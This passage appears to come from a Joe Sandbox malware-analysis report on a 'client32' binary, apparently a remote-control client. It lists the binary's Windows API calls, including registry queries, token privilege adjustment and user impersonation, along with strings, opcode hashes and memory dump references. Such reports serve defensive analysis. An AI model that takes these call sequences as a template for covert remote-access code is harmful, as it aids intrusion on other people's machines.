                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                                • API String ID: 2511061093-2542869446
                                                                                                                • Opcode ID: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
                                                                                                                • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                                                • Opcode Fuzzy Hash: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
                                                                                                                • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                                                                APIs
                                                                                                                • GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                • _memset.LIBCMT ref: 11145CFD
                                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A38400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                • _strncpy.LIBCMT ref: 11145DCA
                                                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                • API String ID: 3299820421-2117887902
                                                                                                                • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                                                • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                                                • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                                                • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                • API String ID: 4195908086-2348320231
                                                                                                                • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                                • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                                                • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                                • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                • API String ID: 2102423945-35127696
                                                                                                                • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                                • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                                                • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                                • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                                                APIs
                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,`(,?,00000001,00000001), ref: 1109EDB0
                                                                                                                • EqualSid.ADVAPI32(?,00EB2860,?,00000001,00000001), ref: 1109EDC3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                • String ID: `(
                                                                                                                • API String ID: 1878589025-1319497050
                                                                                                                • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                                • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                                                • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                                • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                • API String ID: 3192549508-611217420
                                                                                                                • Opcode ID: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
                                                                                                                • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                                                • Opcode Fuzzy Hash: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
                                                                                                                • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,0BAD89F8,00080000,00000000,?), ref: 1109D88D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2349140579-0
                                                                                                                • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                                • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                                                • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                                • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                                                • CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                                • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                                                • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                                • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                                                  • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                                                • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                                                                • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                                                                • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                                                                • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                                                  • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                                                  • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                                                  • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                                                  • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                                                • DispatchMessageA.USER32(?), ref: 11030136
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                                                • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                                                • SetWindowPos.USER32(0002045A,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                                                                • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0BAD89F8,?,?,00000000), ref: 1112909A
                                                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                                                  • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
